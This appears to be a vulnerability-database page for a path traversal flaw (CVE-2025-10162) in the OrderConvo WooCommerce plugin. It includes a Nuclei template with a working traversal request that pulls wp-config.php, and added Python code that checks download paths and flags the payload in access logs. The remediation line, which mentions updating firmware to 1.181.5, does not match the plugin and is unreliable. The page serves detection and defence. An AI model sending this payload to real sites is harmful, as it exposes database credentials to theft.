WordPress OrderConvo < 14 - Path Traversal
CVE-2025-10162
Verified
Description
WooCommerce OrderConvo WordPress plugin < 14 contains a path traversal vulnerability caused by improper validation of file download paths, letting unauthenticated attackers read or download arbitrary files remotely.
Severity
High
CVSS Score
7.5
Exploit Probability
39%
Published Date
May 4, 2026
Template Author
0x_akoko
CVE-2025-10162.yaml

id: CVE-2025-10162

info:
  name: WordPress OrderConvo < 14 - Path Traversal
  author: 0x_Akoko
  severity: high
  description: |
    WooCommerce OrderConvo WordPress plugin < 14 contains a path traversal vulnerability caused by improper validation of file download paths, letting unauthenticated attackers read or download arbitrary files remotely.
  impact: |
    Unauthenticated attackers can read or download arbitrary files, potentially exposing sensitive information.
  remediation: |
    Update firmware to a version later than 1.181.5 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/
    - https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-10162
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-10162
    cwe-id: CWE-22
    epss-score: 0.38811
    epss-percentile: 0.97316
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wp,wp-plugin,wordpress,woocommerce,orderconvo,wooconvo,lfi,traversal,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204c6c85eeaebbe3dd7d48a0711f9ff7a91e5c8ee0f14e5e6b269073bfd8aa650a022100cfd93e6d265487a61e7fcb51f989ebc57a231723f3258f8d0697262e5820dd30:922c64590222798bb761d5b6d8e72950
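The template above probes the `/wp-json/wooconvo/v1/download-file` endpoint with a `filename` value that walks up out of the upload directory (CWE-22). The following Python is an added example, not code from the OrderConvo plugin or from the Nuclei template, showing the two things a defender wants around this class of bug: a containment check of the kind the advisory implies is missing from the plugin's download handler, and a detection rule that flags traversal attempts against this endpoint in web-server access logs. The plugin's real handler is not shown on this page, so `safe_download_path` is a generic illustration, and the log lines are constructed samples.

```python
"""Defender-side helpers for the OrderConvo download-file traversal (CVE-2025-10162).

Added example; the plugin's actual download code is not on the advisory page.
`safe_download_path` is a generic CWE-22 containment check (assumed, not the
plugin's own logic); SAMPLE_LOG holds constructed access-log lines.
"""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

DOWNLOAD_ENDPOINT = "/wp-json/wooconvo/v1/download-file"  # endpoint named in the template
# A ".." segment delimited by a path separator (or string start/end).
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Combined-log-format prefix: client ip, ident, user, [timestamp], "request", status.
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3})')


def safe_download_path(base_dir: str, filename: str) -> Optional[str]:
    """Resolve `filename` inside `base_dir`; return None if it would escape.

    This is the check the vulnerable handler lacks: the caller-supplied name
    must be a bare file name, and the resolved path must still sit under the
    upload directory after symlinks and ".." are collapsed.
    """
    if not filename or "\x00" in filename:
        return None
    # A bare file name has no directory component; any slash or ".." fails here.
    if os.path.basename(filename) != filename or filename in (".", ".."):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # Containment: the common prefix of base and candidate must be base itself.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def is_traversal_attempt(request_line: str) -> bool:
    """True if an HTTP request line hits the download endpoint with a
    `filename` containing a traversal segment (single- or double-encoded)."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return False
    parts = urlsplit(target)
    if parts.path.rstrip("/") != DOWNLOAD_ENDPOINT:
        return False
    # parse_qs percent-decodes once; unquote again to catch %252e%252e%252f.
    for value in parse_qs(parts.query).get("filename", []):
        if TRAVERSAL_RE.search(unquote(value)):
            return True
    return False


def flag_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str, int]]:
    """Scan combined-format access-log lines and return (ip, request, status)
    for every request that looks like a traversal attempt on the endpoint."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request, status = m.groups()
        if is_traversal_attempt(request):
            hits.append((ip, request, int(status)))
    return hits


# Constructed sample log lines (not real traffic). The first two carry the
# template's payload, plain and double-encoded; the others are benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/May/2026:10:00:01 +0000] "GET /wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php HTTP/1.1" 200 3172',
    '203.0.113.7 - - [04/May/2026:10:00:02 +0000] "GET /wp-json/wooconvo/v1/download-file?order_id=1&filename=..%252f..%252f..%252f..%252fwp-config.php HTTP/1.1" 200 3172',
    '198.51.100.2 - - [04/May/2026:10:01:00 +0000] "GET /wp-json/wooconvo/v1/download-file?order_id=42&filename=invoice-42.pdf HTTP/1.1" 200 81234',
    '198.51.100.9 - - [04/May/2026:10:02:00 +0000] "GET /wp-json/wc/v3/orders HTTP/1.1" 401 95',
]

if __name__ == "__main__":
    for ip, request, status in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip} (HTTP {status}): {request}")
    print(safe_download_path("/srv/wooconvo-uploads", "../../../../wp-config.php"))
    print(safe_download_path("/srv/wooconvo-uploads", "invoice-42.pdf"))
```

A status of 200 on a flagged request, as in the first two sample lines, is the signal that matters: it means the server served the traversal rather than rejecting it, which is the same condition the template's `status` matcher keys on. The containment check treats the request as hostile on either test failing, so a `filename` that is syntactically clean but points through a symlink out of the upload directory is still refused.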
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-10162
CWE ID:
cwe-22
Remediation Steps
Update firmware to a version later than 1.181.5 or the latest available version.